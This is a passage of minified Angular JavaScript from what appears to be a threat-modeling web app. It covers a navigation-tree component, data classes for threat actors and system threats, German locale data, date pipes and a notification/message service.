null===(k=T.children)||void 0===k?void 0:k.includes(e)}))||void 0===c?void 0:c.children)||void 0===d||d.forEach(T=>this.treeControl.collapse(T)))}OnExpand(e,i){var n,r,c,d;1==i?(this.treeControl.expand(e),null===(n=e.children)||void 0===n||n.forEach(T=>this.treeControl.expand(T))):2==i?null===(r=e.children)||void 0===r||r.forEach(T=>this.OnExpand(T,1)):0==i&&(this.dataSource.data.includes(e)?this.dataSource.data.forEach(T=>this.OnExpand(T,1)):null===(d=null===(c=xa.FlattenNodes(this.dataSource.data).find(T=>{var k;return null===(k=T.children)||void 0===k?void 0:k.includes(e)}))||void 0===c?void 0:c.children)||void 0===d||d.forEach(T=>this.OnExpand(T,1)))}SetNavTreeData(e,i=null){this.activeNode=null,i&&(this.activeNode=e.find(r=>r.data==i)),this.dataSource.data=e,xa.FlattenNodes(e).forEach(r=>{(r.isExpanded||null==r.isExpanded&&r.children&&r.children.length>0)&&(r.isExpanded=!0,this.treeControl.expand(r))})}OnNodeClick(e,i){i.stopPropagation(),!(!e.canSelect||e.isInactive&&e.isInactive())&&(this.activeNode=e)}OnNodeDoubleClick(e){!e.canSelect||this.nodeDoubleClicked.emit(e)}OnNodeChecked(e){!this.canCheckMultiple&&!e.isChecked&&xa.FlattenNodes(this.dataSource.data).forEach(i=>i.isChecked=!1),e.isChecked=!e.isChecked,this.checkedNodesChanged.emit(xa.FlattenNodes(this.dataSource.data).filter(i=>i.isChecked))}OnEditName(e){e.isRenaming=!0,setTimeout(()=>{var i;null===(i=document.getElementById("renameBox"))||void 0===i||i.focus()},100)}OnRename(e,i){("Enter"===e.key||"focusout"===e.type)&&(i.isRenaming=!1,i.onRename&&i.onRename(e.target.value))}resetDataSource(){let e=this.dataSource.data;this.dataSource.data=null,this.dataSource.data=e}CanSelet(e){return e.canSelect&&!(e.isInactive&&e.isInactive())}}return t.\u0275fac=function(e){return new(e||t)(Ee(Oa),Ee(Yi))},t.\u0275cmp=Wt({type:t,selectors:[["app-nav-tree"]],viewQuery:function(e,i){if(1&e&&Mi(fRe,5),2&e){let n;Vt(n=Bt())&&(i.matMenuTrigger=n.first)}},inputs:{activeNode:"activeNode",checkEnabled:"checkEnabled",canCheckMultiple:"canCheckMultiple",checkedNodes:"checkedNodes"},outputs:{selectedNodeChanged:"selectedNodeChanged",checkedNodesChanged:"checkedNodesChanged",nodeDoubleClicked:"nodeDoubleClicked"},decls:30,vars:8,consts:[[1,"nav-tree",2,"background-color","transparent",3,"dataSource","treeControl"],["matTreeNodeToggle","","class","disable-select",3,"highlight-light","highlight-dark","font-weight","cursor","click","dblclick","contextmenu",4,"matTreeNodeDef"],["class","disable-select",3,"cursor","click","dblclick","contextmenu",4,"matTreeNodeDef","matTreeNodeDefWhen"],["menuMenu","matMenu"],["matMenuContent",""],[2,"visibility","hidden","position","fixed",3,"matMenuTriggerFor"],["ctxMenu","matMenuTrigger"],["rightMenu","matMenu"],["groupsMenu","matMenu"],["matTreeNodeToggle","",1,"disable-select",3,"click","dblclick","contextmenu"],["color","primary","style","margin-right: 5px;",3,"disabled","checked","change",4,"ngIf"],["style","margin-right: 5px;",4,"ngIf"],["style","margin-right: 10px; margin-left: 5px;","matTooltipShowDelay","1000",3,"opacity","matTooltip",4,"ngIf"],["style","margin-right: 10px; margin-left: -5px; font-size: smaller;","matTooltipShowDelay","1000",3,"opacity","matTooltip",4,"ngIf"],[4,"ngIf"],["mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click",4,"ngIf"],["mat-icon-button","","matTooltipShowDelay","1000",3,"matMenuTriggerFor","matTooltip",4,"ngIf"],["addMenu","matMenu"],["mat-menu-item","",3,"click",4,"ngFor","ngForOf"],["style","margin-left: auto; margin-right: 5px; opacity: 1;",4,"ngIf"],["color","primary",2,"margin-right","5px",3,"disabled","checked","change"],[2,"margin-right","5px"],["matTooltipShowDelay","1000",2,"margin-right","10px","margin-left","5px",3,"matTooltip"],["matTooltipShowDelay","1000",2,"margin-right","10px","margin-left","-5px","font-size","smaller",3,"matTooltip"],["id","renameBox","type","text","autofocus","","onfocus","this.select();",2,"width","-webkit-fill-available",3,"spellcheck","ngModel","keydown","focusout"],["mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click"],["mat-icon-button","","matTooltipShowDelay","1000",3,"matMenuTriggerFor","matTooltip"],["mat-menu-item","",3,"click"],[2,"margin-left","auto","margin-right","5px","opacity","1"],[1,"disable-select",3,"click","dblclick","contextmenu"],[1,"mat-tree-node"],["mat-icon-button","","matTreeNodeToggle","",3,"click"],[1,"mat-icon-rtl-mirror",2,"opacity","1"],["style","margin-right: 10px;","matTooltipShowDelay","1000",3,"opacity","matTooltip",4,"ngIf"],["mat-icon-button","","style","margin-left: auto; margin-right: 5px; opacity: 1;","matTooltipShowDelay","1000",3,"matMenuTriggerFor","matMenuTriggerData","matTooltip",4,"ngIf"],["style","margin-right: 5px; opacity: 1;",3,"marginLeft",4,"ngIf"],["role","group"],["matTreeNodeOutlet",""],["matTooltipShowDelay","1000",2,"margin-right","10px",3,"matTooltip"],["mat-icon-button","","matTooltipShowDelay","1000",2,"margin-left","auto","margin-right","5px","opacity","1",3,"matMenuTriggerFor","matMenuTriggerData","matTooltip"],[2,"margin-right","5px","opacity","1"],["mat-menu-item","",3,"matMenuTriggerFor"],["collapseMenu","matMenu"],["expandMenu","matMenu"],["style","margin-left: 20px; margin-right: 20px;",4,"ngIf"],["mat-menu-item","",3,"disabled","click"],["mat-menu-item","",3,"disabled","matMenuTriggerFor","matMenuTriggerData"],[2,"margin-left","20px","margin-right","20px"]],template:function(e,i){if(1&e&&(m(0,"mat-tree",0),s(1,"\n  "),s(2,"\n  "),s(3,"\n  "),ne(4,xRe,30,20,"mat-tree-node",1),s(5,"\n  "),s(6,"\n  "),ne(7,BRe,45,21,"mat-nested-tree-node",2),s(8,"\n"),u(),s(9,"\n\n"),m(10,"mat-menu",null,3),s(12,"\n  "),ne(13,qRe,33,8,"ng-template",4),s(14," \n"),u(),s(15,"\n\n"),it(16,"div",5,6),s(18," \n"),m(19,"mat-menu",null,7),s(21," \n  "),ne(22,QRe,33,18,"ng-template",4),s(23," \n"),u(),s(24," \n"),m(25,"mat-menu",null,8),s(27,"\n  "),ne(28,KRe,3,1,"ng-template",4),s(29," \n"),u()),2&e){const n=Ti(20);V("dataSource",i.dataSource)("treeControl",i.treeControl),C(7),V("matTreeNodeDefWhen",i.HasChild),C(9),ri("left",i.menuTopLeftPosition.x)("top",i.menuTopLeftPosition.y),V("matMenuTriggerFor",n)}},dependencies:[Zi,Ri,an,Ta,Ea,oa,J3,Kw,Yw,Xw,Y3,ab,br,da,Xo,qo,po,el,Pa,Xi],styles:[".primary-color[_ngcontent-%COMP%]{color:#2196f3!important}.primary-background[_ngcontent-%COMP%]{background-color:#2196f3!important}.bg-color-light1[_ngcontent-%COMP%], .splitter-light2[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light1[_ngcontent-%COMP%]     .as-split-gutter{background-color:#e7e5e5!important}.bg-color-light2[_ngcontent-%COMP%]{background-color:#f5f5f5!important}.bg-color-light3[_ngcontent-%COMP%]{background-color:#fff!important}.bg-color-dark1[_ngcontent-%COMP%], .splitter-dark2[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%]     .as-split-gutter{background-color:#333!important}.bg-color-dark2[_ngcontent-%COMP%]{background-color:#252525!important}.bg-color-dark3[_ngcontent-%COMP%]{background-color:#1e1e1e!important}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter{position:relative}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon{background-image:none!important;transition:opacity .3s;opacity:0;position:absolute}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover{opacity:1;background-color:#2196f3}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon{background-color:#2196f3;opacity:1}.tab-icon[_ngcontent-%COMP%]{margin-right:8px}.mat-tree-node[_ngcontent-%COMP%]{min-height:28px!important;height:28px}.mat-tree-node[_ngcontent-%COMP%]:hover   .mat-icon[_ngcontent-%COMP%]{opacity:1}.mat-tree-node[_ngcontent-%COMP%]   .mat-icon[_ngcontent-%COMP%]{opacity:.4}.nav-tree-invisible[_ngcontent-%COMP%]{display:none}.nav-tree[_ngcontent-%COMP%]   ul[_ngcontent-%COMP%], .nav-tree[_ngcontent-%COMP%]   li[_ngcontent-%COMP%]{margin-top:0;margin-bottom:0;list-style-type:none}.nav-tree[_ngcontent-%COMP%]   .mat-nested-tree-node[_ngcontent-%COMP%]   div[role=group][_ngcontent-%COMP%]{padding-left:20px}.nav-tree[_ngcontent-%COMP%]   div[role=group][_ngcontent-%COMP%] > .mat-tree-node[_ngcontent-%COMP%]{padding-left:20px}.highlight-light[_ngcontent-%COMP%]{background-color:#0000001a}.highlight-light[_ngcontent-%COMP%]   .mat-icon[_ngcontent-%COMP%]{opacity:1!important}.highlight-dark[_ngcontent-%COMP%]{background-color:#ffffff1a}.highlight-dark[_ngcontent-%COMP%]   .mat-icon[_ngcontent-%COMP%]{opacity:1!important}.mat-icon-button[_ngcontent-%COMP%]{width:30px}.disable-select[_ngcontent-%COMP%]{user-select:none;-webkit-user-select:none;-khtml-user-select:none;-moz-user-select:none;-ms-user-select:none}"]}),t})(),CT=(()=>{class t{constructor(){this.showLeftBar=!0}OnSameRoute(){this.showLeftBar=!this.showLeftBar}SetNavTreeData(e){this.navTree.SetNavTreeData(e)}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275cmp=Wt({type:t,selectors:[["ng-component"]],viewQuery:function(e,i){if(1&e&&Mi(df,5),2&e){let n;Vt(n=Bt())&&(i.navTree=n.first)}},decls:0,vars:0,template:function(e,i){},encapsulation:2}),t})();class dM extends Ln{constructor(a,e,i){super(a),this.StepProperties=["Application","Sector","Function","Features","Connectivity","LocEnv","Accessories","ProductionProcess","Criticality","Requirements","TargetMarket","Standards","InvolvedPeople","Budget","Timeframe","ExpectedOutput","Assumptions"],this.project=e,this.config=i,this.Sector||(this.Sector=[]),this.Function||(this.Function=[]),this.Features||(this.Features=[]),this.Accessories||(this.Accessories=[]),this.Application||(this.Application=[]),this.Requirements||(this.Requirements=[]),this.Criticality||(this.Criticality=[]),this.LocEnv||(this.LocEnv=[]),this.Connectivity||(this.Connectivity=[]),this.ProductionProcess||(this.ProductionProcess=[]),this.TargetMarket||(this.TargetMarket=[]),this.Standards||(this.Standards=[]),this.InvolvedPeople||(this.InvolvedPeople=[]),this.Budget||(this.Budget=[]),this.Timeframe||(this.Timeframe=[]),this.ExpectedOutput||(this.ExpectedOutput=[]),this.Assumptions||(this.Assumptions=[])}get Sector(){return this.Data.Sector}set Sector(a){this.Data.Sector=a}get Function(){return this.Data.Function}set Function(a){this.Data.Function=a}get Features(){return this.Data.Features}set Features(a){this.Data.Features=a}get Accessories(){return this.Data.Accessories}set Accessories(a){this.Data.Accessories=a}get Application(){return this.Data.Application}set Application(a){this.Data.Application=a}get Requirements(){return this.Data.Requirements}set Requirements(a){this.Data.Requirements=a}get Criticality(){return this.Data.Criticality}set Criticality(a){this.Data.Criticality=a}get LocEnv(){return this.Data.LocEnv}set LocEnv(a){this.Data.LocEnv=a}get Connectivity(){return this.Data.Connectivity}set Connectivity(a){this.Data.Connectivity=a}get ProductionProcess(){return this.Data.ProductionProcess}set ProductionProcess(a){this.Data.ProductionProcess=a}get TargetMarket(){return this.Data.TargetMarket}set TargetMarket(a){this.Data.TargetMarket=a}get Standards(){return this.Data.Standards}set Standards(a){this.Data.Standards=a}get InvolvedPeople(){return this.Data.InvolvedPeople}set InvolvedPeople(a){this.Data.InvolvedPeople=a}get Budget(){return this.Data.Budget}set Budget(a){this.Data.Budget=a}get Timeframe(){return this.Data.Timeframe}set Timeframe(a){this.Data.Timeframe=a}get ExpectedOutput(){return this.Data.ExpectedOutput}set ExpectedOutput(a){this.Data.ExpectedOutput=a}get Assumptions(){return this.Data.Assumptions}set Assumptions(a){this.Data.Assumptions=a}FindReferences(a,e){return[]}OnDelete(a,e){}static FromJSON(a,e,i){return new dM(a,e,i)}}class mM extends Ln{constructor(a,e,i){super(a),this.StepProperties=["DeviceGoals","BusinessGoals","BusinessImpact"],this.project=e,this.config=i,this.DeviceGoals||(this.DeviceGoals=[]),this.BusinessGoals||(this.BusinessGoals=[]),this.BusinessImpact||(this.BusinessImpact=[])}get DeviceGoals(){return this.Data.DeviceGoals}set DeviceGoals(a){this.Data.DeviceGoals=a}get BusinessGoals(){return this.Data.BusinessGoals}set BusinessGoals(a){this.Data.BusinessGoals=a}get BusinessImpact(){return this.Data.BusinessImpact}set BusinessImpact(a){this.Data.BusinessImpact=a}FindReferences(a,e){return[]}OnDelete(a,e){}static FromJSON(a,e,i){return new mM(a,e,i)}}class Gp extends Ln{constructor(a,e,i){super(a),this.project=e,this.Motive||(this.Motive=[]),this.Capabilities||(this.Capabilities=[])}get Number(){return this.Data.Number}set Number(a){this.Data.Number=a&&String(a)}get Motive(){return this.Data.Motive}set Motive(a){this.Data.Motive=a}get Capabilities(){return this.Data.Capabilities}set Capabilities(a){this.Data.Capabilities=a}get Likelihood(){return this.Data.Likelihood}set Likelihood(a){this.Data.Likelihood=a}CheckUniqueNumber(){return this.project.GetThreatActors().some(a=>a.Number==this.Number&&a.ID!=this.ID)}GetLongName(){return"TS"+Gi.EmptyIfNull(this.Number)+") "+this.Name}FindReferences(a,e){return[]}OnDelete(a,e){a.GetThreatSources().RemoveThreatActor(this)}static FromJSON(a,e,i){return new Gp(a,e,i)}}class uM extends Ln{constructor(a,e,i){super(a),this.project=e,this.config=i,this.Data.sourceIDs||(this.Data.sourceIDs=[])}get Sources(){let a=[];return this.Data.sourceIDs.forEach(e=>a.push(this.project.GetThreatActor(e))),a}set Sources(a){this.Data.sourceIDs=null==a?void 0:a.map(e=>e.ID)}AddThreatActor(a){this.Sources.includes(a)||this.Data.sourceIDs.push(a.ID)}RemoveThreatActor(a){this.Sources.includes(a)&&this.Data.sourceIDs.splice(this.Data.sourceIDs.indexOf(a.ID),1)}FindReferences(a,e){return[]}OnDelete(a,e){}static FromJSON(a,e,i){return new uM(a,e,i)}}class hM extends Ln{constructor(a,e,i){super(a),this.project=e,this.config=i,this.Impact||(this.Impact=dr.Medium),this.ImpactCats||(this.Data.ImpactCats=[])}get Number(){return this.Data.Number}set Number(a){this.Data.Number=a&&String(a)}get AffectedAssetObjects(){let a=[];return this.Data.affectedAssetObjectIDs&&(this.project.GetAssetGroups().filter(e=>this.Data.affectedAssetObjectIDs.includes(e.ID)).forEach(e=>a.push(e)),this.project.GetMyDatas().filter(e=>this.Data.affectedAssetObjectIDs.includes(e.ID)).forEach(e=>a.push(e))),a}set AffectedAssetObjects(a){this.Data.affectedAssetObjectIDs=null==a?void 0:a.map(e=>e.ID)}get ThreatCategory(){return this.config.GetThreatCategory(this.Data.threatCategoryID)}set ThreatCategory(a){this.Data.threatCategoryID=null==a?void 0:a.ID,a&&(this.Data.ImpactCats=JSON.parse(JSON.stringify(a.ImpactCats)))}get ImpactCats(){return this.Data.ImpactCats}get Impact(){return this.Data.Impact}set Impact(a){this.Data.Impact=a}CheckUniqueNumber(){return this.project.GetSystemThreats().some(a=>a.Number==this.Number&&a.ID!=this.ID)}GetLongName(){return"ST"+Gi.EmptyIfNull(this.Number)+") "+this.Name}FindReferences(a,e){let i=[];return null==a||a.GetAttackScenarios().filter(n=>n.SystemThreats.includes(this)).forEach(n=>i.push({Type:li.RemoveSystemThreatFromAttackScenario,Param:n})),i}OnDelete(a,e){this.FindReferences(a,e).forEach(n=>{if(n.Type==li.RemoveSystemThreatFromAttackScenario){const r=n.Param;r.SystemThreats=r.SystemThreats.filter(c=>c.ID!=this.ID)}})}static FromJSON(a,e,i){return new hM(a,e,i)}}const Js=void 0;!function wre(t,a,e){(function tae(t,a,e){"string"!=typeof a&&(e=a,a=t[Ji.LocaleId]),a=a.toLowerCase().replace(/_/g,"-"),c1[a]=t,e&&(c1[a][Ji.ExtraData]=e)})(t,a,e)}(["de",[["AM","PM"],Js,Js],Js,[["S","M","D","M","D","F","S"],["So.","Mo.","Di.","Mi.","Do.","Fr.","Sa."],["Sonntag","Montag","Dienstag","Mittwoch","Donnerstag","Freitag","Samstag"],["So.","Mo.","Di.","Mi.","Do.","Fr.","Sa."]],[["S","M","D","M","D","F","S"],["So","Mo","Di","Mi","Do","Fr","Sa"],["Sonntag","Montag","Dienstag","Mittwoch","Donnerstag","Freitag","Samstag"],["So.","Mo.","Di.","Mi.","Do.","Fr.","Sa."]],[["J","F","M","A","M","J","J","A","S","O","N","D"],["Jan.","Feb.","M\xe4rz","Apr.","Mai","Juni","Juli","Aug.","Sept.","Okt.","Nov.","Dez."],["Januar","Februar","M\xe4rz","April","Mai","Juni","Juli","August","September","Oktober","November","Dezember"]],[["J","F","M","A","M","J","J","A","S","O","N","D"],["Jan","Feb","M\xe4r","Apr","Mai","Jun","Jul","Aug","Sep","Okt","Nov","Dez"],["Januar","Februar","M\xe4rz","April","Mai","Juni","Juli","August","September","Oktober","November","Dezember"]],[["v. Chr.","n. Chr."],Js,Js],1,[6,0],["dd.MM.yy","dd.MM.y","d. MMMM y","EEEE, d. MMMM y"],["HH:mm","HH:mm:ss","HH:mm:ss z","HH:mm:ss zzzz"],["{1}, {0}",Js,"{1} 'um' {0}",Js],[",",".",";","%","+","-","E","\xb7","\u2030","\u221e","NaN",":"],["#,##0.###","#,##0\xa0%","#,##0.00\xa0\xa4","#E0"],"EUR","\u20ac","Euro",{ATS:["\xf6S"],AUD:["AU$","$"],BGM:["BGK"],BGO:["BGJ"],BYN:[Js,"\u0440."],CUC:[Js,"Cub$"],DEM:["DM"],FKP:[Js,"Fl\xa3"],GHS:[Js,"\u20b5"],GNF:[Js,"F.G."],KMF:[Js,"FC"],PHP:[Js,"\u20b1"],RON:[Js,"L"],RUR:[Js,"\u0440."],RWF:[Js,"F.Rw"],SYP:[],THB:["\u0e3f"],TWD:["NT$"],XXX:[],ZMW:[Js,"K"]},"ltr",function XRe(t){const e=Math.floor(Math.abs(t)),i=t.toString().replace(/^[^.]*\.?/,"").length;return 1===e&&0===i?1:5}],"de",[[["Mitternacht","morgens","vorm.","mittags","nachm.","abends","nachts"],void 0,["Mitternacht","morgens","vormittags","mittags","nachmittags","abends","nachts"]],[["Mitternacht","Morgen","Vorm.","Mittag","Nachm.","Abend","Nacht"],void 0,["Mitternacht","Morgen","Vormittag","Mittag","Nachmittag","Abend","Nacht"]],["00:00",["05:00","10:00"],["10:00","12:00"],["12:00","13:00"],["13:00","18:00"],["18:00","24:00"],["00:00","05:00"]]]);let T5=(()=>{class t{constructor(e){this.localization=e}transform(e,i=null){return e?(i||(i="shortDate"),e6(e,i,this.localization.Locale)):""}}return t.\u0275fac=function(e){return new(e||t)(Ee(yT,16))},t.\u0275pipe=Fr({name:"localDate",type:t,pure:!0}),t})(),E5=(()=>{class t{constructor(e){this.localization=e}transform(e,i=null){return e?(i||(i="medium"),e6(e,i,this.localization.Locale)):""}}return t.\u0275fac=function(e){return new(e||t)(Ee(yT,16))},t.\u0275pipe=Fr({name:"localDateTime",type:t,pure:!0}),t})(),JRe=(()=>{class t extends q1{constructor(e){super(),this.translateService=e,this.getRangeLabel=(i,n,r)=>{const c=this.translateService?this.translateService.instant("paginator.of"):"of";if(0===r||0===n)return"0 "+c+" "+r;const d=i*n>(r=Math.max(r,0))?(Math.ceil(r/n)-1)*n:i*n;return d+1+" - "+Math.min(d+n,r)+" "+c+" "+r},this.translateService.onLangChange.subscribe(i=>{this.translateLabels()}),this.translateLabels()}injectTranslateService(e){this.translateService=e,this.translateService.onLangChange.subscribe(()=>{this.translateLabels()}),this.translateLabels()}translateLabels(){this.firstPageLabel=this.translateService.instant("paginator.firstPage"),this.itemsPerPageLabel=this.translateService.instant("paginator.itemsPerPage"),this.lastPageLabel=this.translateService.instant("paginator.lastPage"),this.nextPageLabel=this.translateService.instant("paginator.nextPage"),this.previousPageLabel=this.translateService.instant("paginator.previousPage"),this.changes.next()}}return t.\u0275fac=function(e){return new(e||t)(At(Sn))},t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})(),yT=(()=>{class t{constructor(e,i){this.translate=e,this.locStorage=i,this.locale=this.locStorage.Get(si.LANGUAGE)}get Locale(){return this.locale||"en"}set Locale(e){this.locale=e,this.translate.use(e),this.locStorage.Set(si.LANGUAGE,e)}}return t.\u0275fac=function(e){return new(e||t)(At(Sn),At(_r))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})();function ZRe(t,a){1&t&&(m(0,"mat-icon",10),oe(1,"translate"),s(2,"info"),u()),2&t&&at("matTooltip",re(1,1,"general.Info"))}function eSe(t,a){1&t&&(m(0,"mat-icon",10),oe(1,"translate"),s(2,"check_circle"),u()),2&t&&at("matTooltip",re(1,1,"general.Success"))}function tSe(t,a){1&t&&(m(0,"mat-icon",10),oe(1,"translate"),s(2,"warning"),u()),2&t&&at("matTooltip",re(1,1,"general.Warning"))}function iSe(t,a){1&t&&(m(0,"mat-icon",10),oe(1,"translate"),s(2,"error"),u()),2&t&&at("matTooltip",re(1,1,"general.Error"))}function aSe(t,a){if(1&t&&(m(0,"mat-list-item"),s(1,"\n        "),ne(2,ZRe,3,3,"mat-icon",8),s(3,"\n        "),ne(4,eSe,3,3,"mat-icon",8),s(5,"\n        "),ne(6,tSe,3,3,"mat-icon",8),s(7,"\n        "),ne(8,iSe,3,3,"mat-icon",8),s(9,"\n        "),m(10,"div",9),s(11),u(),s(12,"\n        "),m(13,"div",9),s(14),oe(15,"localDateTime"),u(),s(16,"\n      "),u()),2&t){const e=a.$implicit;C(2),V("ngIf","info"==e.type),C(2),V("ngIf","success"==e.type),C(2),V("ngIf","warning"==e.type),C(2),V("ngIf","error"==e.type),C(3),ke(e.text),C(3),ke(re(15,6,e.time))}}function nSe(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n    "),m(2,"mat-chip-list",5),s(3,"\n      "),m(4,"mat-chip",6),he("click",function(){be(e);const n=B();return Me(n.showError=!n.showError)}),s(5),oe(6,"translate"),u(),s(7,"\n      "),m(8,"mat-chip",6),he("click",function(){be(e);const n=B();return Me(n.showWarning=!n.showWarning)}),s(9),oe(10,"translate"),u(),s(11,"\n      "),m(12,"mat-chip",6),he("click",function(){be(e);const n=B();return Me(n.showSuccess=!n.showSuccess)}),s(13),oe(14,"translate"),u(),s(15,"\n      "),m(16,"mat-chip",6),he("click",function(){be(e);const n=B();return Me(n.showInfo=!n.showInfo)}),s(17),oe(18,"translate"),u(),s(19,"\n    "),u(),s(20,"\n    "),m(21,"mat-list"),s(22,"\n      "),ne(23,aSe,17,8,"mat-list-item",7),s(24,"\n    "),u(),s(25,"\n  "),Mt()}if(2&t){const e=B();C(4),V("selected",e.showError),C(1),ke(re(6,9,"general.Error")),C(3),V("selected",e.showWarning),C(1),ke(re(10,11,"general.Warning")),C(3),V("selected",e.showSuccess),C(1),ke(re(14,13,"general.Success")),C(3),V("selected",e.showInfo),C(1),ke(re(18,15,"general.Info")),C(6),V("ngForOf",e.filteredMessages)}}function oSe(t,a){1&t&&(bt(0),s(1,"\n    "),m(2,"p"),s(3),oe(4,"translate"),u(),s(5,"\n  "),Mt()),2&t&&(C(3),ke(re(4,1,"dialog.messages.noEntries")))}let rSe=(()=>{class t{constructor(e){this.messages=e,this.showError=!0,this.showWarning=!0,this.showSuccess=!0,this.showInfo=!0}get filteredMessages(){let e=this.messages;return this.showError||(e=e.filter(i=>"error"!=i.type)),this.showWarning||(e=e.filter(i=>"warning"!=i.type)),this.showSuccess||(e=e.filter(i=>"success"!=i.type)),this.showInfo||(e=e.filter(i=>"info"!=i.type)),e}ngOnInit(){}}return t.\u0275fac=function(e){return new(e||t)(Ee(_p))},t.\u0275cmp=Wt({type:t,selectors:[["app-messages-dialog"]],decls:21,vars:12,consts:[["mat-dialog-title",""],[4,"ngIf"],["align","end"],["mat-button","",3,"mat-dialog-close"],["mat-button","","mat-dialog-close","","cdkFocusInitial",""],["multiple",""],["color","primary",3,"selected","click"],[4,"ngFor","ngForOf"],["mat-list-icon","",3,"matTooltip",4,"ngIf"],["mat-line",""],["mat-list-icon","",3,"matTooltip"]],template:function(e,i){1&e&&(m(0,"h2",0),s(1),oe(2,"translate"),u(),s(3,"\n"),m(4,"mat-dialog-content"),s(5,"\n  "),ne(6,nSe,26,17,"ng-container",1),s(7,"\n  "),ne(8,oSe,6,3,"ng-container",1),s(9,"\n"),u(),s(10,"\n"),m(11,"mat-dialog-actions",2),s(12,"\n  "),m(13,"button",3),s(14),oe(15,"translate"),u(),s(16,"\n  "),m(17,"button",4),s(18),oe(19,"translate"),u(),s(20,"\n"),u()),2&e&&(C(1),ke(re(2,6,"general.Messages")),C(5),V("ngIf",i.messages.length>0),C(2),V("ngIf",0==i.messages.length),C(5),V("mat-dialog-close",!0),C(1),ke(re(15,8,"general.Clear")),C(4),ke(re(19,10,"general.Close")))},dependencies:[Zi,Ri,oa,da,m8,db,ts,is,Or,Lr,Pa,vm,Am,Tm,Em,Xi,E5]}),t})(),A2=(()=>{class t{constructor(e,i,n,r){this.snackBar=e,this.translateService=i,this.locStorage=n,this.dialog=r,this.TIMEOUT=3e3,this.Messages=[],window.onerror=(c,d,T,k,q)=>(c.toString().startsWith("ResizeObserver loop")||this.Error(c.toString(),[d,T,k,q]),!1)}get ErrorMsgs(){return this.Messages.filter(e=>"error"==e.type)}get WarningMsgs(){return this.Messages.filter(e=>"warning"==e.type)}get SuccessMsgs(){return this.Messages.filter(e=>"success"==e.type)}get InfoMsgs(){return this.Messages.filter(e=>"info"==e.type)}get ShowErrors(){let e=this.locStorage.Get(si.MSG_SHOW_ERROR);return null==e||"true"==e}set ShowErrors(e){this.locStorage.Set(si.MSG_SHOW_ERROR,String(e))}get ShowWarnings(){let e=this.locStorage.Get(si.MSG_SHOW_WARNING);return null==e||"true"==e}set ShowWarnings(e){this.locStorage.Set(si.MSG_SHOW_WARNING,String(e))}get ShowSuccesses(){let e=this.locStorage.Get(si.MSG_SHOW_SUCCESS);return null==e||"true"==e}set ShowSuccesses(e){this.locStorage.Set(si.MSG_SHOW_SUCCESS,String(e))}get ShowInfos(){let e=this.locStorage.Get(si.MSG_SHOW_INFO);return null==e||"true"==e}set ShowInfos(e){this.locStorage.Set(si.MSG_SHOW_INFO,String(e))}get ShowUnsavedChanges(){let e=this.locStorage.Get(si.MSG_SHOW_UNSAVED_CHANGED);return null==e||"true"==e}set ShowUnsavedChanges(e){this.locStorage.Set(si.MSG_SHOW_UNSAVED_CHANGED,String(e))}Info(e,i){let n=this.buildMsg(e,i);this.Messages.unshift({text:n,type:"info",time:(new Date).toString()}),this.ShowInfos&&this.snackBar.open(n,null,{duration:this.TIMEOUT,panelClass:"messages-info"})}Success(e,i){let n=this.buildMsg(e,i);this.Messages.unshift({text:n,type:"success",time:(new Date).toString()}),this.ShowSuccesses&&this.snackBar.open(n,null,{duration:this.TIMEOUT,panelClass:"messages-success"})}Warning(e,i){let n=this.buildMsg(e,i);this.Messages.unshift({text:n,type:"warning",time:(new Date).toString()}),this.ShowWarnings&&this.snackBar.open(n,null,{duration:this.TIMEOUT,panelClass:"messages-warning"})}Error(e,i){let n=this.buildMsg(e,i);this.Messages.unshift({text:n,type:"error",time:(new Date).toString()}),console.error(n),this.ShowErrors&&this.snackBar.open(n,null,{duration:this.TIMEOUT,panelClass:"messages-error"})}UnsavedChanges(e,i){let 